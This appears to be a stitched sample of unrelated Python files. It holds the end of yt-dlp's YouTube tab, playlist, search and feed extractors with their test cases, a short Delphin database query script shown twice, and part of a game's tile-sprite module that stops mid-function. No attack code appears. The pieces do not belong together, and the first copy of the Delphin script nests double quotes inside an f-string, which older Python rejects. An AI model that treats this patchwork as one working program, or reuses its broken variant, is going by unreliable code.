'channel': 'NoCopyrightSounds',
},
'playlist_mincount': 166,
'expected_warnings': [r'[Uu]navailable videos (are|will be) hidden'],
}, {
'note': 'Topic, should redirect to playlist?list=UU...',
'url': 'https://music.youtube.com/browse/UC9ALqqC4aIeG5iDs7i90Bfw',
'info_dict': {
'id': 'UU9ALqqC4aIeG5iDs7i90Bfw',
'uploader_id': 'UC9ALqqC4aIeG5iDs7i90Bfw',
'title': 'Uploads from Royalty Free Music - Topic',
'uploader': 'Royalty Free Music - Topic',
'tags': [],
'channel_id': 'UC9ALqqC4aIeG5iDs7i90Bfw',
'channel': 'Royalty Free Music - Topic',
'view_count': int,
'channel_url': 'https://www.youtube.com/channel/UC9ALqqC4aIeG5iDs7i90Bfw',
'channel_url': 'https://www.youtube.com/channel/UC9ALqqC4aIeG5iDs7i90Bfw',
'modified_date': r're:\d{8}',
'uploader_url': 'https://www.youtube.com/channel/UC9ALqqC4aIeG5iDs7i90Bfw',
'description': '',
},
'expected_warnings': [
'The URL does not have a videos tab',
r'[Uu]navailable videos (are|will be) hidden',
],
'playlist_mincount': 101,
}, {
'note': 'Topic without a UU playlist',
'url': 'https://www.youtube.com/channel/UCtFRv9O2AHqOZjjynzrv-xg',
'info_dict': {
'id': 'UCtFRv9O2AHqOZjjynzrv-xg',
'title': 'UCtFRv9O2AHqOZjjynzrv-xg',
'tags': [],
},
'expected_warnings': [
'the playlist redirect gave error',
],
'playlist_mincount': 9,
}, {
'note': 'Youtube music Album',
'url': 'https://music.youtube.com/browse/MPREb_gTAcphH99wE',
'info_dict': {
'id': 'OLAK5uy_l1m0thk3g31NmIIz_vMIbWtyv7eZixlH0',
'title': 'Album - Royalty Free Music Library V2 (50 Songs)',
'tags': [],
'view_count': int,
'description': '',
'availability': 'unlisted',
'modified_date': r're:\d{8}',
},
'playlist_count': 50,
}, {
'note': 'unlisted single video playlist',
'url': 'https://www.youtube.com/playlist?list=PLwL24UFy54GrB3s2KMMfjZscDi1x5Dajf',
'info_dict': {
'uploader_id': 'UC9zHu_mHU96r19o-wV5Qs1Q',
'uploader': 'colethedj',
'id': 'PLwL24UFy54GrB3s2KMMfjZscDi1x5Dajf',
'title': 'yt-dlp unlisted playlist test',
'availability': 'unlisted',
'tags': [],
'modified_date': '20211208',
'channel': 'colethedj',
'view_count': int,
'description': '',
'uploader_url': 'https://www.youtube.com/channel/UC9zHu_mHU96r19o-wV5Qs1Q',
'channel_id': 'UC9zHu_mHU96r19o-wV5Qs1Q',
'channel_url': 'https://www.youtube.com/channel/UC9zHu_mHU96r19o-wV5Qs1Q',
},
'playlist_count': 1,
}, {
'note': 'API Fallback: Recommended - redirects to home page. Requires visitorData',
'url': 'https://www.youtube.com/feed/recommended',
'info_dict': {
'id': 'recommended',
'title': 'recommended',
'tags': [],
},
'playlist_mincount': 50,
'params': {
'skip_download': True,
'extractor_args': {'youtubetab': {'skip': ['webpage']}}
},
}, {
'note': 'API Fallback: /videos tab, sorted by oldest first',
'url': 'https://www.youtube.com/user/theCodyReeder/videos?view=0&sort=da&flow=grid',
'info_dict': {
'id': 'UCu6mSoMNzHQiBIOCkHUa2Aw',
'title': 'Cody\'sLab - Videos',
'description': 'md5:d083b7c2f0c67ee7a6c74c3e9b4243fa',
'uploader': 'Cody\'sLab',
'uploader_id': 'UCu6mSoMNzHQiBIOCkHUa2Aw',
'channel': 'Cody\'sLab',
'channel_id': 'UCu6mSoMNzHQiBIOCkHUa2Aw',
'tags': [],
'channel_url': 'https://www.youtube.com/channel/UCu6mSoMNzHQiBIOCkHUa2Aw',
'uploader_url': 'https://www.youtube.com/channel/UCu6mSoMNzHQiBIOCkHUa2Aw',
'channel_follower_count': int
},
'playlist_mincount': 650,
'params': {
'skip_download': True,
'extractor_args': {'youtubetab': {'skip': ['webpage']}}
},
}, {
'note': 'API Fallback: Topic, should redirect to playlist?list=UU...',
'url': 'https://music.youtube.com/browse/UC9ALqqC4aIeG5iDs7i90Bfw',
'info_dict': {
'id': 'UU9ALqqC4aIeG5iDs7i90Bfw',
'uploader_id': 'UC9ALqqC4aIeG5iDs7i90Bfw',
'title': 'Uploads from Royalty Free Music - Topic',
'uploader': 'Royalty Free Music - Topic',
'modified_date': r're:\d{8}',
'channel_id': 'UC9ALqqC4aIeG5iDs7i90Bfw',
'description': '',
'channel_url': 'https://www.youtube.com/channel/UC9ALqqC4aIeG5iDs7i90Bfw',
'tags': [],
'channel': 'Royalty Free Music - Topic',
'view_count': int,
'uploader_url': 'https://www.youtube.com/channel/UC9ALqqC4aIeG5iDs7i90Bfw',
},
'expected_warnings': [
'does not have a videos tab',
r'[Uu]navailable videos (are|will be) hidden',
],
'playlist_mincount': 101,
'params': {
'skip_download': True,
'extractor_args': {'youtubetab': {'skip': ['webpage']}}
},
}, {
'note': 'non-standard redirect to regional channel',
'url': 'https://www.youtube.com/channel/UCwVVpHQ2Cs9iGJfpdFngePQ',
'only_matching': True
}, {
'note': 'collaborative playlist (uploader name in the form "by <uploader> and x other(s)")',
'url': 'https://www.youtube.com/playlist?list=PLx-_-Kk4c89oOHEDQAojOXzEzemXxoqx6',
'info_dict': {
'id': 'PLx-_-Kk4c89oOHEDQAojOXzEzemXxoqx6',
'modified_date': '20220407',
'channel_url': 'https://www.youtube.com/channel/UCKcqXmCcyqnhgpA5P0oHH_Q',
'tags': [],
'uploader_id': 'UCKcqXmCcyqnhgpA5P0oHH_Q',
'uploader': 'pukkandan',
'availability': 'unlisted',
'channel_id': 'UCKcqXmCcyqnhgpA5P0oHH_Q',
'channel': 'pukkandan',
'description': 'Test for collaborative playlist',
'title': 'yt-dlp test - collaborative playlist',
'uploader_url': 'https://www.youtube.com/channel/UCKcqXmCcyqnhgpA5P0oHH_Q',
},
'playlist_mincount': 2
}]
@classmethod
def suitable(cls, url):
return False if YoutubeIE.suitable(url) else super(
YoutubeTabIE, cls).suitable(url)
_URL_RE = re.compile(rf'(?P<pre>{_VALID_URL})(?(not_channel)|(?P<tab>/\w+))?(?P<post>.*)$')
@YoutubeTabBaseInfoExtractor.passthrough_smuggled_data
def _real_extract(self, url, smuggled_data):
item_id = self._match_id(url)
url = compat_urlparse.urlunparse(
compat_urlparse.urlparse(url)._replace(netloc='www.youtube.com'))
compat_opts = self.get_param('compat_opts', [])
def get_mobj(url):
mobj = self._URL_RE.match(url).groupdict()
mobj.update((k, '') for k, v in mobj.items() if v is None)
return mobj
mobj, redirect_warning = get_mobj(url), None
# Youtube returns incomplete data if tabname is not lower case
pre, tab, post, is_channel = mobj['pre'], mobj['tab'].lower(), mobj['post'], not mobj['not_channel']
if is_channel:
if smuggled_data.get('is_music_url'):
if item_id[:2] == 'VL': # Youtube music VL channels have an equivalent playlist
item_id = item_id[2:]
pre, tab, post, is_channel = f'https://www.youtube.com/playlist?list={item_id}', '', '', False
elif item_id[:2] == 'MP': # Resolve albums (/[channel/browse]/MP...) to their equivalent playlist
mdata = self._extract_tab_endpoint(
f'https://music.youtube.com/channel/{item_id}', item_id, default_client='web_music')
murl = traverse_obj(mdata, ('microformat', 'microformatDataRenderer', 'urlCanonical'),
get_all=False, expected_type=compat_str)
if not murl:
raise ExtractorError('Failed to resolve album to playlist')
return self.url_result(murl, ie=YoutubeTabIE.ie_key())
elif mobj['channel_type'] == 'browse': # Youtube music /browse/ should be changed to /channel/
pre = f'https://www.youtube.com/channel/{item_id}'
original_tab_name = tab
if is_channel and not tab and 'no-youtube-channel-redirect' not in compat_opts:
# Home URLs should redirect to /videos/
redirect_warning = ('A channel/user page was given. All the channel\'s videos will be downloaded. '
'To download only the videos in the home page, add a "/featured" to the URL')
tab = '/videos'
url = ''.join((pre, tab, post))
mobj = get_mobj(url)
# Handle both video/playlist URLs
qs = parse_qs(url)
video_id, playlist_id = [qs.get(key, [None])[0] for key in ('v', 'list')]
if not video_id and mobj['not_channel'].startswith('watch'):
if not playlist_id:
# If there is neither video or playlist ids, youtube redirects to home page, which is undesirable
raise ExtractorError('Unable to recognize tab page')
# Common mistake: https://www.youtube.com/watch?list=playlist_id
self.report_warning(f'A video URL was given without video ID. Trying to download playlist {playlist_id}')
url = f'https://www.youtube.com/playlist?list={playlist_id}'
mobj = get_mobj(url)
if video_id and playlist_id:
if self.get_param('noplaylist'):
self.to_screen(f'Downloading just video {video_id} because of --no-playlist')
return self.url_result(f'https://www.youtube.com/watch?v={video_id}',
ie=YoutubeIE.ie_key(), video_id=video_id)
self.to_screen(f'Downloading playlist {playlist_id}; add --no-playlist to just download video {video_id}')
data, ytcfg = self._extract_data(url, item_id)
# YouTube may provide a non-standard redirect to the regional channel
# See: https://github.com/yt-dlp/yt-dlp/issues/2694
redirect_url = traverse_obj(
data, ('onResponseReceivedActions', ..., 'navigateAction', 'endpoint', 'commandMetadata', 'webCommandMetadata', 'url'), get_all=False)
if redirect_url and 'no-youtube-channel-redirect' not in compat_opts:
redirect_url = ''.join((
urljoin('https://www.youtube.com', redirect_url), mobj['tab'], mobj['post']))
self.to_screen(f'This playlist is likely not available in your region. Following redirect to regional playlist {redirect_url}')
return self.url_result(redirect_url, ie=YoutubeTabIE.ie_key())
tabs = traverse_obj(data, ('contents', 'twoColumnBrowseResultsRenderer', 'tabs'), expected_type=list)
if tabs:
selected_tab = self._extract_selected_tab(tabs)
selected_tab_name = selected_tab.get('title', '').lower()
if selected_tab_name == 'home':
selected_tab_name = 'featured'
requested_tab_name = mobj['tab'][1:]
if 'no-youtube-channel-redirect' not in compat_opts:
if requested_tab_name == 'live':
# Live tab should have redirected to the video
raise ExtractorError('The channel is not currently live', expected=True)
if requested_tab_name not in ('', selected_tab_name):
redirect_warning = f'The channel does not have a {requested_tab_name} tab'
if not original_tab_name:
if item_id[:2] == 'UC':
# Topic channels don't have /videos. Use the equivalent playlist instead
pl_id = f'UU{item_id[2:]}'
pl_url = f'https://www.youtube.com/playlist?list={pl_id}'
try:
data, ytcfg = self._extract_data(pl_url, pl_id, ytcfg=ytcfg, fatal=True, webpage_fatal=True)
except ExtractorError:
redirect_warning += ' and the playlist redirect gave error'
else:
item_id, url, selected_tab_name = pl_id, pl_url, requested_tab_name
redirect_warning += f'. Redirecting to playlist {pl_id} instead'
if selected_tab_name and selected_tab_name != requested_tab_name:
redirect_warning += f'. {selected_tab_name} tab is being downloaded instead'
else:
raise ExtractorError(redirect_warning, expected=True)
if redirect_warning:
self.to_screen(redirect_warning)
self.write_debug(f'Final URL: {url}')
# YouTube sometimes provides a button to reload playlist with unavailable videos.
if 'no-youtube-unavailable-videos' not in compat_opts:
data = self._reload_with_unavailable_videos(item_id, data, ytcfg) or data
self._extract_and_report_alerts(data, only_once=True)
tabs = traverse_obj(data, ('contents', 'twoColumnBrowseResultsRenderer', 'tabs'), expected_type=list)
if tabs:
return self._extract_from_tabs(item_id, ytcfg, data, tabs)
playlist = traverse_obj(
data, ('contents', 'twoColumnWatchNextResults', 'playlist', 'playlist'), expected_type=dict)
if playlist:
return self._extract_from_playlist(item_id, url, data, playlist, ytcfg)
video_id = traverse_obj(
data, ('currentVideoEndpoint', 'watchEndpoint', 'videoId'), expected_type=str) or video_id
if video_id:
if mobj['tab'] != '/live': # live tab is expected to redirect to video
self.report_warning(f'Unable to recognize playlist. Downloading just video {video_id}')
return self.url_result(f'https://www.youtube.com/watch?v={video_id}',
ie=YoutubeIE.ie_key(), video_id=video_id)
raise ExtractorError('Unable to recognize tab page')
class YoutubePlaylistIE(InfoExtractor):
IE_DESC = 'YouTube playlists'
_VALID_URL = r'''(?x)(?:
(?:https?://)?
(?:\w+\.)?
(?:
(?:
youtube(?:kids)?\.com|
%(invidious)s
)
/.*?\?.*?\blist=
)?
(?P<id>%(playlist_id)s)
)''' % {
'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE,
'invidious': '|'.join(YoutubeBaseInfoExtractor._INVIDIOUS_SITES),
}
IE_NAME = 'youtube:playlist'
_TESTS = [{
'note': 'issue #673',
'url': 'PLBB231211A4F62143',
'info_dict': {
'title': '[OLD]Team Fortress 2 (Class-based LP)',
'id': 'PLBB231211A4F62143',
'uploader': 'Wickman',
'uploader_id': 'UCKSpbfbl5kRQpTdL7kMc-1Q',
'description': 'md5:8fa6f52abb47a9552002fa3ddfc57fc2',
'view_count': int,
'uploader_url': 'https://www.youtube.com/user/Wickydoo',
'modified_date': r're:\d{8}',
'channel_id': 'UCKSpbfbl5kRQpTdL7kMc-1Q',
'channel': 'Wickman',
'tags': [],
'channel_url': 'https://www.youtube.com/user/Wickydoo',
},
'playlist_mincount': 29,
}, {
'url': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
'info_dict': {
'title': 'YDL_safe_search',
'id': 'PLtPgu7CB4gbY9oDN3drwC3cMbJggS7dKl',
},
'playlist_count': 2,
'skip': 'This playlist is private',
}, {
'note': 'embedded',
'url': 'https://www.youtube.com/embed/videoseries?list=PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
'playlist_count': 4,
'info_dict': {
'title': 'JODA15',
'id': 'PL6IaIsEjSbf96XFRuNccS_RuEXwNdsoEu',
'uploader': 'milan',
'uploader_id': 'UCEI1-PVPcYXjB73Hfelbmaw',
'description': '',
'channel_url': 'https://www.youtube.com/channel/UCEI1-PVPcYXjB73Hfelbmaw',
'tags': [],
'modified_date': '20140919',
'view_count': int,
'channel': 'milan',
'channel_id': 'UCEI1-PVPcYXjB73Hfelbmaw',
'uploader_url': 'https://www.youtube.com/channel/UCEI1-PVPcYXjB73Hfelbmaw',
},
'expected_warnings': [r'[Uu]navailable videos (are|will be) hidden'],
}, {
'url': 'http://www.youtube.com/embed/_xDOZElKyNU?list=PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
'playlist_mincount': 654,
'info_dict': {
'title': '2018 Chinese New Singles (11/6 updated)',
'id': 'PLsyOSbh5bs16vubvKePAQ1x3PhKavfBIl',
'uploader': 'LBK',
'uploader_id': 'UC21nz3_MesPLqtDqwdvnoxA',
'description': 'md5:da521864744d60a198e3a88af4db0d9d',
'channel': 'LBK',
'view_count': int,
'channel_url': 'https://www.youtube.com/c/愛低音的國王',
'tags': [],
'uploader_url': 'https://www.youtube.com/c/愛低音的國王',
'channel_id': 'UC21nz3_MesPLqtDqwdvnoxA',
'modified_date': r're:\d{8}',
},
'expected_warnings': [r'[Uu]navailable videos (are|will be) hidden'],
}, {
'url': 'TLGGrESM50VT6acwMjAyMjAxNw',
'only_matching': True,
}, {
# music album playlist
'url': 'OLAK5uy_m4xAFdmMC5rX3Ji3g93pQe3hqLZw_9LhM',
'only_matching': True,
}]
@classmethod
def suitable(cls, url):
if YoutubeTabIE.suitable(url):
return False
from ..utils import parse_qs
qs = parse_qs(url)
if qs.get('v', [None])[0]:
return False
return super(YoutubePlaylistIE, cls).suitable(url)
def _real_extract(self, url):
playlist_id = self._match_id(url)
is_music_url = YoutubeBaseInfoExtractor.is_music_url(url)
url = update_url_query(
'https://www.youtube.com/playlist',
parse_qs(url) or {'list': playlist_id})
if is_music_url:
url = smuggle_url(url, {'is_music_url': True})
return self.url_result(url, ie=YoutubeTabIE.ie_key(), video_id=playlist_id)
class YoutubeYtBeIE(InfoExtractor):
IE_DESC = 'youtu.be'
_VALID_URL = r'https?://youtu\.be/(?P<id>[0-9A-Za-z_-]{11})/*?.*?\blist=(?P<playlist_id>%(playlist_id)s)' % {'playlist_id': YoutubeBaseInfoExtractor._PLAYLIST_ID_RE}
_TESTS = [{
'url': 'https://youtu.be/yeWKywCrFtk?list=PL2qgrgXsNUG5ig9cat4ohreBjYLAPC0J5',
'info_dict': {
'id': 'yeWKywCrFtk',
'ext': 'mp4',
'title': 'Small Scale Baler and Braiding Rugs',
'uploader': 'Backus-Page House Museum',
'uploader_id': 'backuspagemuseum',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/backuspagemuseum',
'upload_date': '20161008',
'description': 'md5:800c0c78d5eb128500bffd4f0b4f2e8a',
'categories': ['Nonprofits & Activism'],
'tags': list,
'like_count': int,
'age_limit': 0,
'playable_in_embed': True,
'thumbnail': 'https://i.ytimg.com/vi_webp/yeWKywCrFtk/maxresdefault.webp',
'channel': 'Backus-Page House Museum',
'channel_id': 'UCEfMCQ9bs3tjvjy1s451zaw',
'live_status': 'not_live',
'view_count': int,
'channel_url': 'https://www.youtube.com/channel/UCEfMCQ9bs3tjvjy1s451zaw',
'availability': 'public',
'duration': 59,
},
'params': {
'noplaylist': True,
'skip_download': True,
},
}, {
'url': 'https://youtu.be/uWyaPkt-VOI?list=PL9D9FC436B881BA21',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = self._match_valid_url(url)
video_id = mobj.group('id')
playlist_id = mobj.group('playlist_id')
return self.url_result(
update_url_query('https://www.youtube.com/watch', {
'v': video_id,
'list': playlist_id,
'feature': 'youtu.be',
}), ie=YoutubeTabIE.ie_key(), video_id=playlist_id)
class YoutubeLivestreamEmbedIE(InfoExtractor):
IE_DESC = 'YouTube livestream embeds'
_VALID_URL = r'https?://(?:\w+\.)?youtube\.com/embed/live_stream/?\?(?:[^#]+&)?channel=(?P<id>[^&#]+)'
_TESTS = [{
'url': 'https://www.youtube.com/embed/live_stream?channel=UC2_KI6RB__jGdlnK6dvFEZA',
'only_matching': True,
}]
def _real_extract(self, url):
channel_id = self._match_id(url)
return self.url_result(
f'https://www.youtube.com/channel/{channel_id}/live',
ie=YoutubeTabIE.ie_key(), video_id=channel_id)
class YoutubeYtUserIE(InfoExtractor):
IE_DESC = 'YouTube user videos; "ytuser:" prefix'
IE_NAME = 'youtube:user'
_VALID_URL = r'ytuser:(?P<id>.+)'
_TESTS = [{
'url': 'ytuser:phihag',
'only_matching': True,
}]
def _real_extract(self, url):
user_id = self._match_id(url)
return self.url_result(
'https://www.youtube.com/user/%s/videos' % user_id,
ie=YoutubeTabIE.ie_key(), video_id=user_id)
class YoutubeFavouritesIE(YoutubeBaseInfoExtractor):
IE_NAME = 'youtube:favorites'
IE_DESC = 'YouTube liked videos; ":ytfav" keyword (requires cookies)'
_VALID_URL = r':ytfav(?:ou?rite)?s?'
_LOGIN_REQUIRED = True
_TESTS = [{
'url': ':ytfav',
'only_matching': True,
}, {
'url': ':ytfavorites',
'only_matching': True,
}]
def _real_extract(self, url):
return self.url_result(
'https://www.youtube.com/playlist?list=LL',
ie=YoutubeTabIE.ie_key())
class YoutubeSearchIE(YoutubeTabBaseInfoExtractor, SearchInfoExtractor):
IE_DESC = 'YouTube search'
IE_NAME = 'youtube:search'
_SEARCH_KEY = 'ytsearch'
_SEARCH_PARAMS = 'EgIQAQ%3D%3D' # Videos only
_TESTS = [{
'url': 'ytsearch5:youtube-dl test video',
'playlist_count': 5,
'info_dict': {
'id': 'youtube-dl test video',
'title': 'youtube-dl test video',
}
}]
class YoutubeSearchDateIE(YoutubeTabBaseInfoExtractor, SearchInfoExtractor):
IE_NAME = YoutubeSearchIE.IE_NAME + ':date'
_SEARCH_KEY = 'ytsearchdate'
IE_DESC = 'YouTube search, newest videos first'
_SEARCH_PARAMS = 'CAISAhAB' # Videos only, sorted by date
_TESTS = [{
'url': 'ytsearchdate5:youtube-dl test video',
'playlist_count': 5,
'info_dict': {
'id': 'youtube-dl test video',
'title': 'youtube-dl test video',
}
}]
class YoutubeSearchURLIE(YoutubeTabBaseInfoExtractor):
IE_DESC = 'YouTube search URLs with sorting and filter support'
IE_NAME = YoutubeSearchIE.IE_NAME + '_url'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/(?:results|search)\?([^#]+&)?(?:search_query|q)=(?:[^&]+)(?:[&#]|$)'
_TESTS = [{
'url': 'https://www.youtube.com/results?baz=bar&search_query=youtube-dl+test+video&filters=video&lclk=video',
'playlist_mincount': 5,
'info_dict': {
'id': 'youtube-dl test video',
'title': 'youtube-dl test video',
}
}, {
'url': 'https://www.youtube.com/results?search_query=python&sp=EgIQAg%253D%253D',
'playlist_mincount': 5,
'info_dict': {
'id': 'python',
'title': 'python',
}
}, {
'url': 'https://www.youtube.com/results?search_query=%23cats',
'playlist_mincount': 1,
'info_dict': {
'id': '#cats',
'title': '#cats',
'entries': [{
'url': r're:https://(www\.)?youtube\.com/hashtag/cats',
'title': '#cats',
}],
},
}, {
'url': 'https://www.youtube.com/results?q=test&sp=EgQIBBgB',
'only_matching': True,
}]
def _real_extract(self, url):
qs = parse_qs(url)
query = (qs.get('search_query') or qs.get('q'))[0]
return self.playlist_result(self._search_results(query, qs.get('sp', (None,))[0]), query, query)
class YoutubeMusicSearchURLIE(YoutubeTabBaseInfoExtractor):
IE_DESC = 'YouTube music search URLs with selectable sections (Eg: #songs)'
IE_NAME = 'youtube:music:search_url'
_VALID_URL = r'https?://music\.youtube\.com/search\?([^#]+&)?(?:search_query|q)=(?:[^&]+)(?:[&#]|$)'
_TESTS = [{
'url': 'https://music.youtube.com/search?q=royalty+free+music',
'playlist_count': 16,
'info_dict': {
'id': 'royalty free music',
'title': 'royalty free music',
}
}, {
'url': 'https://music.youtube.com/search?q=royalty+free+music&sp=EgWKAQIIAWoKEAoQAxAEEAkQBQ%3D%3D',
'playlist_mincount': 30,
'info_dict': {
'id': 'royalty free music - songs',
'title': 'royalty free music - songs',
},
'params': {'extract_flat': 'in_playlist'}
}, {
'url': 'https://music.youtube.com/search?q=royalty+free+music#community+playlists',
'playlist_mincount': 30,
'info_dict': {
'id': 'royalty free music - community playlists',
'title': 'royalty free music - community playlists',
},
'params': {'extract_flat': 'in_playlist'}
}]
_SECTIONS = {
'albums': 'EgWKAQIYAWoKEAoQAxAEEAkQBQ==',
'artists': 'EgWKAQIgAWoKEAoQAxAEEAkQBQ==',
'community playlists': 'EgeKAQQoAEABagoQChADEAQQCRAF',
'featured playlists': 'EgeKAQQoADgBagwQAxAJEAQQDhAKEAU==',
'songs': 'EgWKAQIIAWoKEAoQAxAEEAkQBQ==',
'videos': 'EgWKAQIQAWoKEAoQAxAEEAkQBQ==',
}
def _real_extract(self, url):
qs = parse_qs(url)
query = (qs.get('search_query') or qs.get('q'))[0]
params = qs.get('sp', (None,))[0]
if params:
section = next((k for k, v in self._SECTIONS.items() if v == params), params)
else:
section = compat_urllib_parse_unquote_plus((url.split('#') + [''])[1]).lower()
params = self._SECTIONS.get(section)
if not params:
section = None
title = join_nonempty(query, section, delim=' - ')
return self.playlist_result(self._search_results(query, params, default_client='web_music'), title, title)
class YoutubeFeedsInfoExtractor(InfoExtractor):
"""
Base class for feed extractors
Subclasses must define the _FEED_NAME property.
"""
_LOGIN_REQUIRED = True
_TESTS = []
@property
def IE_NAME(self):
return 'youtube:%s' % self._FEED_NAME
def _real_extract(self, url):
return self.url_result(
f'https://www.youtube.com/feed/{self._FEED_NAME}', ie=YoutubeTabIE.ie_key())
class YoutubeWatchLaterIE(InfoExtractor):
IE_NAME = 'youtube:watchlater'
IE_DESC = 'Youtube watch later list; ":ytwatchlater" keyword (requires cookies)'
_VALID_URL = r':ytwatchlater'
_TESTS = [{
'url': ':ytwatchlater',
'only_matching': True,
}]
def _real_extract(self, url):
return self.url_result(
'https://www.youtube.com/playlist?list=WL', ie=YoutubeTabIE.ie_key())
class YoutubeRecommendedIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube recommended videos; ":ytrec" keyword'
_VALID_URL = r'https?://(?:www\.)?youtube\.com/?(?:[?#]|$)|:ytrec(?:ommended)?'
_FEED_NAME = 'recommended'
_LOGIN_REQUIRED = False
_TESTS = [{
'url': ':ytrec',
'only_matching': True,
}, {
'url': ':ytrecommended',
'only_matching': True,
}, {
'url': 'https://youtube.com',
'only_matching': True,
}]
class YoutubeSubscriptionsIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'YouTube subscriptions feed; ":ytsubs" keyword (requires cookies)'
_VALID_URL = r':ytsub(?:scription)?s?'
_FEED_NAME = 'subscriptions'
_TESTS = [{
'url': ':ytsubs',
'only_matching': True,
}, {
'url': ':ytsubscriptions',
'only_matching': True,
}]
class YoutubeHistoryIE(YoutubeFeedsInfoExtractor):
IE_DESC = 'Youtube watch history; ":ythis" keyword (requires cookies)'
_VALID_URL = r':ythis(?:tory)?'
_FEED_NAME = 'history'
_TESTS = [{
'url': ':ythistory',
'only_matching': True,
}]
class YoutubeTruncatedURLIE(InfoExtractor):
IE_NAME = 'youtube:truncated_url'
IE_DESC = False # Do not list
_VALID_URL = r'''(?x)
(?:https?://)?
(?:\w+\.)?[yY][oO][uU][tT][uU][bB][eE](?:-nocookie)?\.com/
(?:watch\?(?:
feature=[a-z_]+|
annotation_id=annotation_[^&]+|
x-yt-cl=[0-9]+|
hl=[^&]*|
t=[0-9]+
)?
|
attribution_link\?a=[^&]+
)
$
'''
_TESTS = [{
'url': 'https://www.youtube.com/watch?annotation_id=annotation_3951667041',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?x-yt-cl=84503534',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?feature=foo',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?hl=en-GB',
'only_matching': True,
}, {
'url': 'https://www.youtube.com/watch?t=2372',
'only_matching': True,
}]
def _real_extract(self, url):
raise ExtractorError(
'Did you forget to quote the URL? Remember that & is a meta '
'character in most shells, so you want to put the URL in quotes, '
'like youtube-dl '
'"https://www.youtube.com/watch?feature=foo&v=BaW_jenozKc" '
' or simply youtube-dl BaW_jenozKc .',
expected=True)
class YoutubeClipIE(InfoExtractor):
IE_NAME = 'youtube:clip'
IE_DESC = False # Do not list
_VALID_URL = r'https?://(?:www\.)?youtube\.com/clip/'
def _real_extract(self, url):
self.report_warning('YouTube clips are not currently supported. The entire video will be downloaded instead')
return self.url_result(url, 'Generic')
class YoutubeTruncatedIDIE(InfoExtractor):
IE_NAME = 'youtube:truncated_id'
IE_DESC = False # Do not list
_VALID_URL = r'https?://(?:www\.)?youtube\.com/watch\?v=(?P<id>[0-9A-Za-z_-]{1,10})$'
_TESTS = [{
'url': 'https://www.youtube.com/watch?v=N_708QY7Ob',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
raise ExtractorError(
'Incomplete YouTube ID %s. URL %s looks truncated.' % (video_id, url),
expected=True)
|
from delphin_6_automation.database_interactions import mongo_setup
from delphin_6_automation.database_interactions.auth import auth_dict
from delphin_6_automation.database_interactions.db_templates import sample_entry, delphin_entry
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORTS
# Modules
# RiBuild Modules
from delphin_6_automation.logging.ribuild_logger import ribuild_logger
# Logger
logger = ribuild_logger(__name__)
# -------------------------------------------------------------------------------------------------------------------- #
# RIBuild
def get_bare():
ids = delphin_entry.Delphin.objects(sample_data__design_option__name__in=['1d_bare'])
print('IDS', ids.count())
return ids
def check_ids(project):
for project in project:
sample = sample_entry.Sample.objects(delphin_docs=project).first()
print(f"Project: {project.id} with sequence {project.sample_data.get("sequence")} is in sample iteration: {sample.iteration}. Data: {project.sample_data.get("exterior_climate")}")
if __name__ == '__main__':
server = mongo_setup.global_init(auth_dict)
ids = get_bare()
check_ids(ids)
mongo_setup.global_end_ssh(server) | from delphin_6_automation.database_interactions import mongo_setup
from delphin_6_automation.database_interactions.auth import auth_dict
from delphin_6_automation.database_interactions.db_templates import sample_entry, delphin_entry
__author__ = "Christian Kongsgaard"
__license__ = 'MIT'
# -------------------------------------------------------------------------------------------------------------------- #
# IMPORTS
# Modules
# RiBuild Modules
from delphin_6_automation.logging.ribuild_logger import ribuild_logger
# Logger
logger = ribuild_logger(__name__)
# -------------------------------------------------------------------------------------------------------------------- #
# RIBuild
def get_bare():
ids = delphin_entry.Delphin.objects(sample_data__design_option__name__in=['1d_bare'])
print('IDS', ids.count())
return ids
def check_ids(project):
for project in project:
sample = sample_entry.Sample.objects(delphin_docs=project).first()
print(f"Project: {project.id} with sequence {project.sample_data.get('sequence')} is in sample iteration: {sample.iteration}. Data: {project.sample_data.get('exterior_climate')}")
if __name__ == '__main__':
server = mongo_setup.global_init(auth_dict)
ids = get_bare()
check_ids(ids)
mongo_setup.global_end_ssh(server) |
from math import tau
from random import choice
import pkgutil
import string
from .common import change_sprite_image
ROTS = {
(1, 0): 0,
(0, 1): 1,
(-1, 0): 2,
(0, -1): 3,
}
SYMBOLS = {}
text = pkgutil.get_data('mufl', 'text/symbols.txt').decode('utf-8')
for line in text.splitlines():
sym, codes = line.rsplit(maxsplit=1)
for i in range(0, len(codes), 4):
key = codes[i:i+4]
SYMBOLS[key] = sym
def encode_letter(letter):
enc = []
for x in range(4):
num = 0
for y in range(5):
num <<= 1
if (x, y) in letter:
num += 1
enc.append(chr(48+num))
return ''.join(enc)
class ThingTile:
def __init__(self):
self.filled = False
self.corners = [False] * 4
def get_sprite_info(self):
fc = '01'[self.filled]
num_corners = sum(self.corners)
if num_corners == 0:
return f'block_{fc}0000', 0
elif num_corners == 1:
return f'block_{fc}1000', tau/4 * self.corners.index(True)
elif num_corners == 2:
if self.corners == [True, False, True, False]:
return f'block_{fc}1010', 0
elif self.corners == [False, True, False, True]:
return f'block_{fc}1010', tau/4
elif self.corners == [True, False, False, True]:
return f'block_{fc}1100', tau*3/4
else:
return f'block_{fc}1100', tau/4 * self.corners.index(True)
elif num_corners == 3:
return f'block_{fc}1110', tau/4 * (self.corners.index(False) + 2)
else:
return f'block_{fc}1111', 0
def update_sprite(self, sprite):
image, rotation = self.get_sprite_info()
change_sprite_image(sprite, image)
sprite.angle = rotation
def set_wormy_corners(self, d, plus=0):
rot = ROTS[d] + plus
self.set_corner(rot)
self.set_corner(rot-1)
def set_corner(self, c):
self.corners[c%4] = True
def encode(self):
num = int(self.filled)
for corner in self.corners:
num <<= 1
